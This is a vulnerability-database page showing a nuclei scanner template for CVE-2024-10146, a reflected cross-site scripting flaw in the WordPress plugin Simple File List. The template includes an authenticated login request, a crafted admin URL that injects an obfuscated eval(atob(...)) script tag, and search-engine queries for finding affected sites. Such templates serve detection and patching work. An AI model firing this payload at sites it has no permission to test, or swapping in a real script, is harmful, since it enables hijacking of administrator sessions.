Lucene search
K

Simple File List < 6.1.13 - Reflected Cross-Site Scripting

🗓️ 22 Jun 2026 05:20:07Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 12 Views

WordPress plugin Simple File List below 6.1.13 has reflected cross-site scripting via unsanitized URL output in an attribute, requiring admin.

Related
Refs
Code
id: CVE-2024-10146

info:
  name: Simple File List < 6.1.13 - Reflected Cross-Site Scripting
  author: 0x_AKoko
  severity: medium
  description: |
    Simple File List WordPress plugin \u003C 6.1.13 contains a reflected cross-site scripting caused by unsanitized URL output in an attribute, letting attackers execute malicious scripts in admin browsers, exploit requires victim to be an admin.
  impact: |
    Attackers can execute malicious scripts in admin browsers, potentially leading to session hijacking or privilege escalation.
  remediation: |
    Update to version 6.1.13 or later.
  reference:
    - https://wpscan.com/vulnerability/9ee74a0f-83ff-4c15-a114-f8f6baab8bf5/
    - https://nvd.nist.gov/vuln/detail/CVE-2024-10146
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 5.4
    cve-id: CVE-2024-10146
    cwe-id: CWE-79
    epss-score: 0.00574
    epss-percentile: 0.42819
    cpe: cpe:2.3:a:simplefilelist:simple_file_list:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 3
    vendor: simplefilelist
    product: simple_file_list
    framework: wordpress
    fofa-query: "wp-content/plugins/simple-file-list/"
    google-query: inurl:"/wp-content/plugins/simple-file-list/"
  tags: cve,cve2024,wpscan,wordpress,wp-plugin,wp,simple-file-list,xss,authenticated

flow: http(1) && http(2)

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In

    matchers:
      - type: dsl
        dsl:
          - status_code == 302
          - contains(header, "wordpress_logged_in")
        condition: and
        internal: true

  - raw:
      - |
        GET /wp-admin/admin.php?page=ee-simple-file-list&tab=settings&subtab=uploader_settings&nfqis%22%3e%3cscript%3eeval(atob(%22YWxlcnQoJ2RvY3VtZW50LmRvbWFpbicp%22))%3c%2fscript%3eepkajs8ophd=1 HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - contains(body, "<script>eval(atob(\"YWxlcnQoJ2RvY3VtZW50LmRvbWFpbicp\"))</script>")
          - contains(body, 'Simple File List')
        condition: and
# digest: 4a0a00473045022100af004b0f5a01409642d50e9ffd86ff9c36479c512dcb148cbd35c9f46bd930dd022010c034b691712f505a644b735195041ef77a1a8182c2f8d4aa2122ae020ba421:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
5.7Medium risk
Vulners AI Score5.7
CVSS 3.15.4
EPSS0.00574
SSVC
12